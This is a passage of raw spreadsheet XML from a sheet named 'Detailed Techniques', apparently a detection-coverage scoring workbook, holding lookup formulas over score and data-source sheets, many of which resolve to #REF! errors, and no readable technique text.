      <c r="F146" s="10" t="s">
        <v>852</v>
      </c>
      <c r="G146" s="10" t="str">
        <f>INDEX('Score Defs'!A$3:A$8,MATCH('Detailed Techniques'!K146,'Score Defs'!B$3:B$8,0))</f>
        <v>None</v>
      </c>
      <c r="H146" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataQuality-Scores'!A$3:A$59&amp;","," "&amp;'Detailed Techniques'!F146&amp;","))+0,'DataQuality-Scores'!B$3:B$59)/(LEN(TRIM(F146))-LEN(SUBSTITUTE(TRIM(F146),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="I146" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'Team-Scores'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F146&amp;","))+0,'Team-Scores'!F$2:F$59)/(LEN(TRIM(F146))-LEN(SUBSTITUTE(TRIM(F146),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="J146" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F146&amp;","))+0,'DataSource-Tool-Coverage'!P$2:P$59)/(LEN(TRIM(F146))-LEN(SUBSTITUTE(TRIM(F146),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="K146" s="51">
        <f t="shared" si="16"/>
        <v>0</v>
      </c>
      <c r="L146" s="20">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F146&amp;","))+0,'DataSource-Tool-Coverage'!$B$2:$B$45)/(LEN(TRIM(F146))-LEN(SUBSTITUTE(TRIM(F146),",",""))+1)</f>
        <v>0</v>
      </c>
      <c r="M146" s="18" t="str">
        <f t="shared" si="17"/>
        <v>0-20</v>
      </c>
      <c r="N146" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F146&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F146))-LEN(SUBSTITUTE(TRIM(F146),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="O146" s="18" t="e">
        <f t="shared" si="18"/>
        <v>#REF!</v>
      </c>
      <c r="P146" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F146&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F146))-LEN(SUBSTITUTE(TRIM(F146),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="Q146" s="18" t="e">
        <f t="shared" si="19"/>
        <v>#REF!</v>
      </c>
      <c r="R146" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F146&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F146))-LEN(SUBSTITUTE(TRIM(F146),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="S146" s="18" t="e">
        <f t="shared" si="20"/>
        <v>#REF!</v>
      </c>
      <c r="T146" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F146&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F146))-LEN(SUBSTITUTE(TRIM(F146),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="U146" s="18" t="e">
        <f t="shared" si="21"/>
        <v>#REF!</v>
      </c>
      <c r="V146" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F146&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F146))-LEN(SUBSTITUTE(TRIM(F146),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="W146" s="18" t="e">
        <f t="shared" si="22"/>
        <v>#REF!</v>
      </c>
      <c r="X146" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F146&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F146))-LEN(SUBSTITUTE(TRIM(F146),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="Y146" s="18" t="e">
        <f t="shared" si="23"/>
        <v>#REF!</v>
      </c>
    </row>
    <row r="147" spans="1:25" ht="99.75" x14ac:dyDescent="0.45">
      <c r="A147" s="8" t="s">
        <v>40</v>
      </c>
      <c r="B147" s="8" t="s">
        <v>2</v>
      </c>
      <c r="C147" s="25" t="s">
        <v>853</v>
      </c>
      <c r="D147" s="18" t="s">
        <v>854</v>
      </c>
      <c r="E147" s="10" t="s">
        <v>855</v>
      </c>
      <c r="F147" s="10" t="s">
        <v>856</v>
      </c>
      <c r="G147" s="10" t="str">
        <f>INDEX('Score Defs'!A$3:A$8,MATCH('Detailed Techniques'!K147,'Score Defs'!B$3:B$8,0))</f>
        <v>None</v>
      </c>
      <c r="H147" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataQuality-Scores'!A$3:A$59&amp;","," "&amp;'Detailed Techniques'!F147&amp;","))+0,'DataQuality-Scores'!B$3:B$59)/(LEN(TRIM(F147))-LEN(SUBSTITUTE(TRIM(F147),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="I147" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'Team-Scores'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F147&amp;","))+0,'Team-Scores'!F$2:F$59)/(LEN(TRIM(F147))-LEN(SUBSTITUTE(TRIM(F147),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="J147" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F147&amp;","))+0,'DataSource-Tool-Coverage'!P$2:P$59)/(LEN(TRIM(F147))-LEN(SUBSTITUTE(TRIM(F147),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="K147" s="51">
        <f t="shared" si="16"/>
        <v>0</v>
      </c>
      <c r="L147" s="20">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F147&amp;","))+0,'DataSource-Tool-Coverage'!$B$2:$B$45)/(LEN(TRIM(F147))-LEN(SUBSTITUTE(TRIM(F147),",",""))+1)</f>
        <v>0</v>
      </c>
      <c r="M147" s="18" t="str">
        <f t="shared" si="17"/>
        <v>0-20</v>
      </c>
      <c r="N147" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F147&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F147))-LEN(SUBSTITUTE(TRIM(F147),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="O147" s="18" t="e">
        <f t="shared" si="18"/>
        <v>#REF!</v>
      </c>
      <c r="P147" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F147&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F147))-LEN(SUBSTITUTE(TRIM(F147),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="Q147" s="18" t="e">
        <f t="shared" si="19"/>
        <v>#REF!</v>
      </c>
      <c r="R147" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F147&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F147))-LEN(SUBSTITUTE(TRIM(F147),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="S147" s="18" t="e">
        <f t="shared" si="20"/>
        <v>#REF!</v>
      </c>
      <c r="T147" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F147&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F147))-LEN(SUBSTITUTE(TRIM(F147),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="U147" s="18" t="e">
        <f t="shared" si="21"/>
        <v>#REF!</v>
      </c>
      <c r="V147" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F147&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F147))-LEN(SUBSTITUTE(TRIM(F147),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="W147" s="18" t="e">
        <f t="shared" si="22"/>
        <v>#REF!</v>
      </c>
      <c r="X147" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F147&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F147))-LEN(SUBSTITUTE(TRIM(F147),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="Y147" s="18" t="e">
        <f t="shared" si="23"/>
        <v>#REF!</v>
      </c>
    </row>
    <row r="148" spans="1:25" ht="57" x14ac:dyDescent="0.45">
      <c r="A148" s="8" t="s">
        <v>156</v>
      </c>
      <c r="B148" s="8" t="s">
        <v>2</v>
      </c>
      <c r="C148" s="25" t="s">
        <v>857</v>
      </c>
      <c r="D148" s="18" t="s">
        <v>858</v>
      </c>
      <c r="E148" s="10" t="s">
        <v>859</v>
      </c>
      <c r="F148" s="10" t="s">
        <v>856</v>
      </c>
      <c r="G148" s="10" t="str">
        <f>INDEX('Score Defs'!A$3:A$8,MATCH('Detailed Techniques'!K148,'Score Defs'!B$3:B$8,0))</f>
        <v>None</v>
      </c>
      <c r="H148" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataQuality-Scores'!A$3:A$59&amp;","," "&amp;'Detailed Techniques'!F148&amp;","))+0,'DataQuality-Scores'!B$3:B$59)/(LEN(TRIM(F148))-LEN(SUBSTITUTE(TRIM(F148),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="I148" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'Team-Scores'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F148&amp;","))+0,'Team-Scores'!F$2:F$59)/(LEN(TRIM(F148))-LEN(SUBSTITUTE(TRIM(F148),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="J148" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F148&amp;","))+0,'DataSource-Tool-Coverage'!P$2:P$59)/(LEN(TRIM(F148))-LEN(SUBSTITUTE(TRIM(F148),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="K148" s="51">
        <f t="shared" si="16"/>
        <v>0</v>
      </c>
      <c r="L148" s="20">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F148&amp;","))+0,'DataSource-Tool-Coverage'!$B$2:$B$45)/(LEN(TRIM(F148))-LEN(SUBSTITUTE(TRIM(F148),",",""))+1)</f>
        <v>0</v>
      </c>
      <c r="M148" s="18" t="str">
        <f t="shared" si="17"/>
        <v>0-20</v>
      </c>
      <c r="N148" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F148&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F148))-LEN(SUBSTITUTE(TRIM(F148),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="O148" s="18" t="e">
        <f t="shared" si="18"/>
        <v>#REF!</v>
      </c>
      <c r="P148" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F148&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F148))-LEN(SUBSTITUTE(TRIM(F148),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="Q148" s="18" t="e">
        <f t="shared" si="19"/>
        <v>#REF!</v>
      </c>
      <c r="R148" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F148&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F148))-LEN(SUBSTITUTE(TRIM(F148),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="S148" s="18" t="e">
        <f t="shared" si="20"/>
        <v>#REF!</v>
      </c>
      <c r="T148" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F148&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F148))-LEN(SUBSTITUTE(TRIM(F148),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="U148" s="18" t="e">
        <f t="shared" si="21"/>
        <v>#REF!</v>
      </c>
      <c r="V148" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F148&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F148))-LEN(SUBSTITUTE(TRIM(F148),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="W148" s="18" t="e">
        <f t="shared" si="22"/>
        <v>#REF!</v>
      </c>
      <c r="X148" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F148&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F148))-LEN(SUBSTITUTE(TRIM(F148),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="Y148" s="18" t="e">
        <f t="shared" si="23"/>
        <v>#REF!</v>
      </c>
    </row>
    <row r="149" spans="1:25" ht="85.5" x14ac:dyDescent="0.45">
      <c r="A149" s="8" t="s">
        <v>169</v>
      </c>
      <c r="B149" s="8" t="s">
        <v>2</v>
      </c>
      <c r="C149" s="25" t="s">
        <v>860</v>
      </c>
      <c r="D149" s="18" t="s">
        <v>861</v>
      </c>
      <c r="E149" s="10" t="s">
        <v>862</v>
      </c>
      <c r="F149" s="10" t="s">
        <v>863</v>
      </c>
      <c r="G149" s="10" t="str">
        <f>INDEX('Score Defs'!A$3:A$8,MATCH('Detailed Techniques'!K149,'Score Defs'!B$3:B$8,0))</f>
        <v>None</v>
      </c>
      <c r="H149" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataQuality-Scores'!A$3:A$59&amp;","," "&amp;'Detailed Techniques'!F149&amp;","))+0,'DataQuality-Scores'!B$3:B$59)/(LEN(TRIM(F149))-LEN(SUBSTITUTE(TRIM(F149),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="I149" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'Team-Scores'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F149&amp;","))+0,'Team-Scores'!F$2:F$59)/(LEN(TRIM(F149))-LEN(SUBSTITUTE(TRIM(F149),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="J149" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F149&amp;","))+0,'DataSource-Tool-Coverage'!P$2:P$59)/(LEN(TRIM(F149))-LEN(SUBSTITUTE(TRIM(F149),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="K149" s="51">
        <f t="shared" si="16"/>
        <v>0</v>
      </c>
      <c r="L149" s="20">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F149&amp;","))+0,'DataSource-Tool-Coverage'!$B$2:$B$45)/(LEN(TRIM(F149))-LEN(SUBSTITUTE(TRIM(F149),",",""))+1)</f>
        <v>0</v>
      </c>
      <c r="M149" s="18" t="str">
        <f t="shared" si="17"/>
        <v>0-20</v>
      </c>
      <c r="N149" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F149&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F149))-LEN(SUBSTITUTE(TRIM(F149),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="O149" s="18" t="e">
        <f t="shared" si="18"/>
        <v>#REF!</v>
      </c>
      <c r="P149" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F149&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F149))-LEN(SUBSTITUTE(TRIM(F149),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="Q149" s="18" t="e">
        <f t="shared" si="19"/>
        <v>#REF!</v>
      </c>
      <c r="R149" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F149&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F149))-LEN(SUBSTITUTE(TRIM(F149),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="S149" s="18" t="e">
        <f t="shared" si="20"/>
        <v>#REF!</v>
      </c>
      <c r="T149" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F149&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F149))-LEN(SUBSTITUTE(TRIM(F149),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="U149" s="18" t="e">
        <f t="shared" si="21"/>
        <v>#REF!</v>
      </c>
      <c r="V149" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F149&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F149))-LEN(SUBSTITUTE(TRIM(F149),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="W149" s="18" t="e">
        <f t="shared" si="22"/>
        <v>#REF!</v>
      </c>
      <c r="X149" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F149&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F149))-LEN(SUBSTITUTE(TRIM(F149),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="Y149" s="18" t="e">
        <f t="shared" si="23"/>
        <v>#REF!</v>
      </c>
    </row>
    <row r="150" spans="1:25" ht="99.75" x14ac:dyDescent="0.45">
      <c r="A150" s="8" t="s">
        <v>193</v>
      </c>
      <c r="B150" s="8" t="s">
        <v>2</v>
      </c>
      <c r="C150" s="25" t="s">
        <v>864</v>
      </c>
      <c r="D150" s="18" t="s">
        <v>865</v>
      </c>
      <c r="E150" s="10" t="s">
        <v>866</v>
      </c>
      <c r="F150" s="10" t="s">
        <v>867</v>
      </c>
      <c r="G150" s="10" t="str">
        <f>INDEX('Score Defs'!A$3:A$8,MATCH('Detailed Techniques'!K150,'Score Defs'!B$3:B$8,0))</f>
        <v>None</v>
      </c>
      <c r="H150" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataQuality-Scores'!A$3:A$59&amp;","," "&amp;'Detailed Techniques'!F150&amp;","))+0,'DataQuality-Scores'!B$3:B$59)/(LEN(TRIM(F150))-LEN(SUBSTITUTE(TRIM(F150),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="I150" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'Team-Scores'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F150&amp;","))+0,'Team-Scores'!F$2:F$59)/(LEN(TRIM(F150))-LEN(SUBSTITUTE(TRIM(F150),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="J150" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F150&amp;","))+0,'DataSource-Tool-Coverage'!P$2:P$59)/(LEN(TRIM(F150))-LEN(SUBSTITUTE(TRIM(F150),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="K150" s="51">
        <f t="shared" si="16"/>
        <v>0</v>
      </c>
      <c r="L150" s="20">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F150&amp;","))+0,'DataSource-Tool-Coverage'!$B$2:$B$45)/(LEN(TRIM(F150))-LEN(SUBSTITUTE(TRIM(F150),",",""))+1)</f>
        <v>0</v>
      </c>
      <c r="M150" s="18" t="str">
        <f t="shared" si="17"/>
        <v>0-20</v>
      </c>
      <c r="N150" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F150&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F150))-LEN(SUBSTITUTE(TRIM(F150),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="O150" s="18" t="e">
        <f t="shared" si="18"/>
        <v>#REF!</v>
      </c>
      <c r="P150" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F150&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F150))-LEN(SUBSTITUTE(TRIM(F150),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="Q150" s="18" t="e">
        <f t="shared" si="19"/>
        <v>#REF!</v>
      </c>
      <c r="R150" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F150&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F150))-LEN(SUBSTITUTE(TRIM(F150),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="S150" s="18" t="e">
        <f t="shared" si="20"/>
        <v>#REF!</v>
      </c>
      <c r="T150" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F150&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F150))-LEN(SUBSTITUTE(TRIM(F150),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="U150" s="18" t="e">
        <f t="shared" si="21"/>
        <v>#REF!</v>
      </c>
      <c r="V150" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F150&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F150))-LEN(SUBSTITUTE(TRIM(F150),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="W150" s="18" t="e">
        <f t="shared" si="22"/>
        <v>#REF!</v>
      </c>
      <c r="X150" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F150&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F150))-LEN(SUBSTITUTE(TRIM(F150),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="Y150" s="18" t="e">
        <f t="shared" si="23"/>
        <v>#REF!</v>
      </c>
    </row>
    <row r="151" spans="1:25" ht="156.75" x14ac:dyDescent="0.45">
      <c r="A151" s="8" t="s">
        <v>135</v>
      </c>
      <c r="B151" s="8" t="s">
        <v>443</v>
      </c>
      <c r="C151" s="25" t="s">
        <v>868</v>
      </c>
      <c r="D151" s="10" t="s">
        <v>869</v>
      </c>
      <c r="E151" s="10" t="s">
        <v>870</v>
      </c>
      <c r="F151" s="10" t="s">
        <v>871</v>
      </c>
      <c r="G151" s="10" t="str">
        <f>INDEX('Score Defs'!A$3:A$8,MATCH('Detailed Techniques'!K151,'Score Defs'!B$3:B$8,0))</f>
        <v>None</v>
      </c>
      <c r="H151" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataQuality-Scores'!A$3:A$59&amp;","," "&amp;'Detailed Techniques'!F151&amp;","))+0,'DataQuality-Scores'!B$3:B$59)/(LEN(TRIM(F151))-LEN(SUBSTITUTE(TRIM(F151),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="I151" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'Team-Scores'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F151&amp;","))+0,'Team-Scores'!F$2:F$59)/(LEN(TRIM(F151))-LEN(SUBSTITUTE(TRIM(F151),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="J151" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F151&amp;","))+0,'DataSource-Tool-Coverage'!P$2:P$59)/(LEN(TRIM(F151))-LEN(SUBSTITUTE(TRIM(F151),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="K151" s="51">
        <f t="shared" si="16"/>
        <v>0</v>
      </c>
      <c r="L151" s="20">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F151&amp;","))+0,'DataSource-Tool-Coverage'!$B$2:$B$45)/(LEN(TRIM(F151))-LEN(SUBSTITUTE(TRIM(F151),",",""))+1)</f>
        <v>0</v>
      </c>
      <c r="M151" s="18" t="str">
        <f t="shared" si="17"/>
        <v>0-20</v>
      </c>
      <c r="N151" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F151&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F151))-LEN(SUBSTITUTE(TRIM(F151),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="O151" s="18" t="e">
        <f t="shared" si="18"/>
        <v>#REF!</v>
      </c>
      <c r="P151" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F151&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F151))-LEN(SUBSTITUTE(TRIM(F151),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="Q151" s="18" t="e">
        <f t="shared" si="19"/>
        <v>#REF!</v>
      </c>
      <c r="R151" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F151&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F151))-LEN(SUBSTITUTE(TRIM(F151),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="S151" s="18" t="e">
        <f t="shared" si="20"/>
        <v>#REF!</v>
      </c>
      <c r="T151" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F151&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F151))-LEN(SUBSTITUTE(TRIM(F151),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="U151" s="18" t="e">
